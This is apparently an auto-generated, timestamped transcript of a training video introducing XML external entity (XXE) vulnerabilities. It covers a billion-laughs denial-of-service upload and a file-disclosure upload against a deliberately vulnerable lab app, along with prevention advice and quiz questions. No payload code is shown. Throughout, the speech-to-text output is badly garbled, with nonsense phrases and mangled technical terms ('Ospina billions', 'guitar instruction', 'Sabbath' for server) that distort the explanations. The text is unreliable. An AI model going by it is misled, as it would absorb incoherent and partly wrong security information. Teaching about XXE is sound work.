XXE Vulnerability Introduction

00:00

Hello. My name's I happily welcome to the overview off Secure code in

00:05

external extra and City's vulnerability is actually the number four on the top. Then Ospina billions is in 2007 which is the latest Asato in this video is very correct. Now I need to I won't be discussing in true crosses scenario impart prevention on some police questions.

00:23

What exactly is XML Extremities on? Acronym for accessible markup language,

00:28

which is similar interests and then it's German is actually meant for the top presentation on Web application while XML is made for the storage and transportation between applications. Now, this is a simple for months for an XML file. Here we have the vision. Yeah, Woody,

00:47

Then here we are recording did city on the document

00:52

definition. So yeah, don't meant that the finish or simply specify the validity off the body off the X. And so this is the body of the excitement itself. Now, in these did city as actually and taco stop contents like what you have here.

01:07

So either I read some configurations or still are kinds of information. So that's adjusted. Now, here you are, on the body off the XML,

01:18

this is your meat back on. This is closing the different between the opening time and inclusive east. These forward slash That's it, then Nothing that may be of interest to you is that the major difference between XML here on the actual HTML is just that here you can use costume pants

01:37

like this is No,

01:38

I can't change it to my need. This is this. I can't change it to its orbit. I continue to my *** or any other thing. So in essence, you know, you have to use standard at that stopping defined as a simple introductions. XML now

01:56

even house at the opportunity of a protein. And it's a mil far to suffer. The simplest is our opportunity to upload Excel files which costar content where they put the all star content inside the density that I showed you. Area, this is it is ready. Entire post are content

02:13

on dhe. When was it was entered, you start content. It can actually cause denial of service in which several things be generated on this summer.

02:22

Andi, it gets a point at the summer, can no longer response. Treat Any doctor somehow just showed up So on that ledge it's images as they are meant to up and Mental, says the Sava for one or two services will not be able to do the back in their service. Is has been tonight.

02:38

That's what I mean by denial of service, then disclosure of confidential information that might be a top secret information.

02:45

The actually or you'll suffer once you start content is and that such information will be reviewed. Jannik, I improve your next work for for the information. So what are the actual costumes off this XML extra non entity

03:00

one of them is using Old XML processes are not capable off dealing with this all star convent. One is when you are poorly written XML persons external pass us also XML processes which are written in the body language. So if you write so SML pasa

03:19

even though you've written it on the modern novel on it is incapable of dealing with this will stop on them, then

03:24

such application will be exploited. So where But take a look at two scenarios of Expedition one is disclosure officer. My information Dada is the other is what denial of service, which we called a 1,000,000,000 last in this case. So let's take a few cats. That's on the

03:44

a potential.

03:46

There have bills which is called week love. So here, if you're just the first time you click this and put it on sign up because I've set up So my accounts on winter looking straight at me. So yeah, you want? Then I want to three.

04:00

I'm with you Logged in yet. This is the dashboard where you can actually perform those miracles. Now here we are, XML external. And so Edwin Starr wins

04:13

Dido's which is the 1,000,000,000 laughs atop. So in this case, you're going to enter us on XML fast. I'm going to show you some XML file samples.

04:20

The art you see on Abydos

04:24

is going to be

04:27

is going to be brought forward, not kids. Now, here we have this idea Files.

04:33

Yeah, this is a father can cause Dido's went to opened out, So it's not spot

04:40

you're gonna see. Yeah, This is the entity where I told you earlier that Attackers actually exploits. Now here you are, Which is what? Someone here is Baba onto trees. Do you want to want to Anamika repetition like the one here means repetition Off back in two places

04:59

on by itself is world. So this, like geometric progression, is like

05:02

tourist parts through. The same thing is applicable here on Yet we have on a diet, which is about that bug is going to be teach to them is you are all of these through something power that is world will be reaching all over please, especially on the summer on once against three points that Texas tea

05:23

memory capacity of the samba Somebody's been suppression markets.

05:26

So it's a simple answer. Now let's take a look at this is the normal except nobody. If you look up the bomb, the back entity has been called it, as we called it can be called in several places so that several things will be written on the Sava. I need to get to the point that it's well over wealthy

05:45

Southern ability on the subway. Just showed up

05:47

on in darkest, denying the legitimate users

05:51

Service is on the southern, so let's see outlets walks in this case. So it says Claudio about file. So I mean says it's only acceptable for much money, So I'm going to brown suede sees you can see here. This is it. Dido's file. You can name it whatever I mean, you decided to

06:11

That's on one issue

06:13

even before before I uploaded it off. So let's offload this part. Laugh are called Good Boy. Let's take a look at What's the content of the good boy? Looks like a good boy. Contains a normal XML far

06:28

here. It contains a normal teen credits. Information I Bond credit card being balanced bill. Phone Drea on all of them. So let's try to upload.

06:40

That's in this case, but also a blue good boy,

06:44

which is expected to be unless

06:46

so, I uploaded it on Insane. Successful. So here there's this part's glad council ments for I mean only now about nudity from the front end I've been on Comes to the back and it looks for such fun. So here

07:03

I just I have many other files are being uploaded. The guy comes there open seats on play expense.

07:09

You can see it has ready contents off the boudoir file, so let's not go back to the front end

07:18

on upload that fire that can actually caused the bigger laughs attack. Hey yeah, Dido's Yar open on Submit. You can see operated successfully, so let's go back to the ad mean end.

07:32

They are mean districts off one morning on feels he needs to check the contact off the father in a pathetic asi

07:39

the group. But I will prove that you are not. This is the Cheetos

07:43

does has been recently uploaded by means. So here Klink pass you guys see saying

07:50

Does which is denied of servants. Suspected sabotage crashed against its support. Reno's right. It simply means the Sabbath got into a level that it's cannot accommodate a ticket. That's a shame, Read it, asks likenesses. So if this were to continue like, Hey, I just made it in such a way that

08:11

economia commodity something lens or strings

08:13

if I decide to make it more than this against it is the hand. If I said to make it more than this Andy, let's all strings that keeps going on. On, on, on on. It's a crash. My browser. It's also crashed back and suffer, and that's just what's up comes now, apart from that.

08:31

So that's what we call denial of seven stone because it simply misses. When my brother crashes. When it's our crushes, don't be ableto illegitimate sees us we'll be able to have access to the real service is now Unless they can you cut the other one which we call.

08:46

I'm sorry on the XML entity Richard called sensitive guitar instruction. Here, use that a lot. So put your details in XML. And also given the or shots of beauty content

08:58

on this thing where Disraeli beauty content, you can upload it. So that's a dangerous opportunity for us to view top secrets.

09:07

I mean top secret files from the summer. Let's take a look at such some pool fire,

09:13

which I call that extra. Yeah, that that's that's my extraction open. It is also an extender from containing the normal things. But here everybody knows this is where you are. Subba December actually used example. So this direction is where you are. This other information

09:33

Saba configuration information. So what? She puts it there as an entity

09:37

on your food IDs. I'm allowed to view the content. It was simply reading some configuration on displayed, including the partial to the Sava, the user name off the Southern. Let's take a look at that. This is a top secret information in this case. So let's take a look at these here

09:58

way off.

10:00

These events will upload. That's our extraction. Close. It's uploaded. So in saying, uploaded successfully. So let's go back to where Winds of view it. So you're gonna see the goodbye out for that first day. Does that seconds. And this was one of our prudent that so

10:18

gets it on passage. Good. If you look at seats in loose, very, very rove by efficiently because you find out that there are some interesting information. So here, if you look at you guys, see, you should changes for a more secure authorization play. We are authentication.

10:39

If you look okay, you can see this is user use alleys route. So that means I'm not changing. This is the default. I'm so use a route. If you go for the idea Proof for that. This is password here. This is where the password is meant to be done. Is my password is empty. I mean, just dentistry.

10:56

That's what you have the details of your supper. Then it would simply be very easy for you

11:01

to actually back into such something. So that's is Just what's the discussion of some more information on the billions of attack is inactive. So what impact off xml estar entity that we have just desperate They

11:18

we have been able to carry out that my instructions we have been able to see

11:24

do us, which is a denial of service on. We have been able to see information discretion. So in what ways can actually prevent XML Exton identity one needs for you to prevent the use off external. It's better to use just for the patrons petition. So it just thought is

11:41

JavaScript object petition, then the other one is

11:45

really XML processes using on external processor that's too possessive. Did city or that are not undo did to do with with poisonous content. Then you have to discard it or you're greedy it so I can handle sort.

12:00

Then I want is for people to disable your ditty processing. It depends on the platform you're using.

12:05

There's when we greet Ajumma that we would reach in the application you can You are probably to see that in some other kind of classes on which the term then you also off validates incoming except your farms. They might least blacklisting here is just going to show you the least off.

12:24

I think they are going to be limited my guess. An opossum.

12:26

So that's a signet stick and you got some quiz questions. Which of the following is not true by XML is imaginary debut. It's just easy for data storage attachments. Petition, not humanity. It is actually not human. It is marshy, reedy. Exactly.

12:43

It is a method. It's our storage.

12:46

It is meant for detail petition. It is also human readable. So saying not human I really miss it is not true. So that's the answer. That question gaze XXI, which is XML external entity. It can be prevented how, By visiting the density, using our food parcels

13:03

using new process or loss of data they ended. Did City wants you disable the density? Excess e can be prevented so summarily we discussed XML as exterminators. Petition, as in institutional way cannot put on XML far put some poison off sightings

13:24

in the big city to steal information.

13:26

We've also said a week passes can actually caused, such as petition on action. You is scenario doings which is denied of service, and I've shown you on impact where we can't screw where you can't disclose confidential information, especially summer off biracial farms or some are controversial secrets

13:43

on you can prevent it by the sibling. Did city So Justin US actually concert basics a 1,000,000 patrons petition. So for new applications believe